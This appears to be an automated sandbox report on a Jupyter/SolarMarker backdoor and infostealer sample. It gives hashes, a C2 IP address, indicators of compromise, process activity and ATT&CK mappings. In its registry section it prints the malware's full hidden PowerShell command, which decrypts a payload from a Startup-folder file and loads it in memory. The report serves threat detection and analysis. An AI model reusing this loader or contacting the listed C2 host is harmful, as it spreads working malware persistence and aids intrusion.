jupyter | 208dbfa91c08f9ccb31ba5cac0037d6794a26ce0bfd57393accac18b4c63c90c

General

Target

b0e233140b6da4899838b5804b6e009bf7ddcf95437b452ca2bbeeff857275b4.exe
Size

279.0MB
MD5

c00696d7f69c3011cbea60f6f50dff88
SHA1

ba34942f3ce656e3eb67f4e4cd9d1cb335bfcf3a
SHA256

b0e233140b6da4899838b5804b6e009bf7ddcf95437b452ca2bbeeff857275b4
SHA512

43e03b528525bb60d808fa65da9f555a232e253e0855f3ecd0536668b4be1647cdf3ce3c962aeb517bb7b73e1add4f788603020f67f2e2825d0dfb53ff95de75

Score

10^/10

jupyter backdoor stealer trojan

Malware Config

Extracted

Family

jupyter

C2

http://146.70.81.82

Signatures

Jupyter, SolarMarker
Jupyter is a backdoor and infostealer first seen in mid 2020.
backdoor trojan stealer jupyter

Drops startup file 1 IoCs

description	ioc	Process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\BRXbrsghMTzTxePbbgN.quAfRVAmRJlhpaSgUeKfJNNOfSztu	b0e233140b6da4899838b5804b6e009bf7ddcf95437b452ca2bbeeff857275b4.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Modifies registry class 7 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-3297182285-798020602-2032295036-1000_Classes\msiwdosharojklxdywsertchon	b0e233140b6da4899838b5804b6e009bf7ddcf95437b452ca2bbeeff857275b4.exe
Key created	\REGISTRY\USER\S-1-5-21-3297182285-798020602-2032295036-1000_Classes\msiwdosharojklxdywsertchon\shell	b0e233140b6da4899838b5804b6e009bf7ddcf95437b452ca2bbeeff857275b4.exe
Key created	\REGISTRY\USER\S-1-5-21-3297182285-798020602-2032295036-1000_Classes\msiwdosharojklxdywsertchon\shell\open	b0e233140b6da4899838b5804b6e009bf7ddcf95437b452ca2bbeeff857275b4.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3297182285-798020602-2032295036-1000_Classes\msiwdosharojklxdywsertchon\shell\open\command\ = "powershell -windowstyle hidden -command \"$AC=New-Object System.Security.Cryptography.AesCryptoServiceProvider;$AC.Key=[Convert]::FromBase64String('ssoCB8g2Lzb6I3oPS50Qmz/VIxC2c2XZY5Tdmmc3wK0=');$EB=[Convert]::FromBase64String([IO.File]::ReadAllText([System.Text.Encoding]::Utf8.GetString([System.Convert]::FromBase64String('QzpcVXNlcnNcQWRtaW5cQXBwRGF0YVxSb2FtaW5nXE1pY3Jvc29mdFxXaW5kb3dzXFN0YXJ0IE1lbnVcUHJvZ3JhbXNcU3RhcnR1cFxCUlhicnNnaE1UelR4ZVBiYmdOLnF1QWZSVkFtUkpsaHBhU2dVZUtmSk5OT2ZTenR1'))));$AC.IV = $EB[0..15];$Decryptor=$AC.CreateDecryptor();$UB=$Decryptor.TransformFinalBlock($EB, 16, $EB.Length-16);$AC.Dispose();[Reflection.Assembly]::Load($UB);[FccAPgrdmSJJPsPgXkaBiRp1MfDHngNBqPXFMPDEGjnPdAuOMQ6AnJD7.pRLW8omEpaZeNY46p]::dbZrMDioJaDx0um_9C2ChJQBHIveU6KVpiz9CCr8_NuF2kG();\""	b0e233140b6da4899838b5804b6e009bf7ddcf95437b452ca2bbeeff857275b4.exe
Key created	\REGISTRY\USER\S-1-5-21-3297182285-798020602-2032295036-1000_Classes\.quafrvamrjlhpasguekfjnnofsztu	b0e233140b6da4899838b5804b6e009bf7ddcf95437b452ca2bbeeff857275b4.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3297182285-798020602-2032295036-1000_Classes\.quafrvamrjlhpasguekfjnnofsztu\ = "msiwdosharojklxdywsertchon"	b0e233140b6da4899838b5804b6e009bf7ddcf95437b452ca2bbeeff857275b4.exe
Key created	\REGISTRY\USER\S-1-5-21-3297182285-798020602-2032295036-1000_Classes\msiwdosharojklxdywsertchon\shell\open\command	b0e233140b6da4899838b5804b6e009bf7ddcf95437b452ca2bbeeff857275b4.exe

Suspicious behavior: EnumeratesProcesses 2 IoCs

pid	Process
1344	b0e233140b6da4899838b5804b6e009bf7ddcf95437b452ca2bbeeff857275b4.exe
1344	b0e233140b6da4899838b5804b6e009bf7ddcf95437b452ca2bbeeff857275b4.exe

Suspicious use of AdjustPrivilegeToken 1 IoCs

description	pid	Process
Token: SeDebugPrivilege	1344	b0e233140b6da4899838b5804b6e009bf7ddcf95437b452ca2bbeeff857275b4.exe

Suspicious use of WriteProcessMemory 2 IoCs

description	pid	Process	procid_target
PID 1196 wrote to memory of 1344	1196	b0e233140b6da4899838b5804b6e009bf7ddcf95437b452ca2bbeeff857275b4.exe	67
PID 1196 wrote to memory of 1344	1196	b0e233140b6da4899838b5804b6e009bf7ddcf95437b452ca2bbeeff857275b4.exe	67

C:\Users\Admin\AppData\Local\Temp\b0e233140b6da4899838b5804b6e009bf7ddcf95437b452ca2bbeeff857275b4.exe
"C:\Users\Admin\AppData\Local\Temp\b0e233140b6da4899838b5804b6e009bf7ddcf95437b452ca2bbeeff857275b4.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:1196
- C:\Users\Admin\AppData\Local\Temp\b0e233140b6da4899838b5804b6e009bf7ddcf95437b452ca2bbeeff857275b4.exe
  "C:\Users\Admin\AppData\Local\Temp\b0e233140b6da4899838b5804b6e009bf7ddcf95437b452ca2bbeeff857275b4.exe" /s
  2⤵
  - Drops startup file
  - Modifies registry class
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:1344

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Information Discovery

1

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

memory/1196-117-0x0000026EE4DE0000-0x0000026EE4F0C000-memory.dmp

Filesize
1.2MB

Download
memory/1344-119-0x00000281E2220000-0x00000281E2242000-memory.dmp

Filesize
136KB

Download
memory/1344-120-0x00000281FABF0000-0x00000281FAC66000-memory.dmp

Filesize
472KB

Download
memory/1344-121-0x00000281FAD70000-0x00000281FAE18000-memory.dmp

Filesize
672KB

Download

Resubmissions

Analysis

Sharing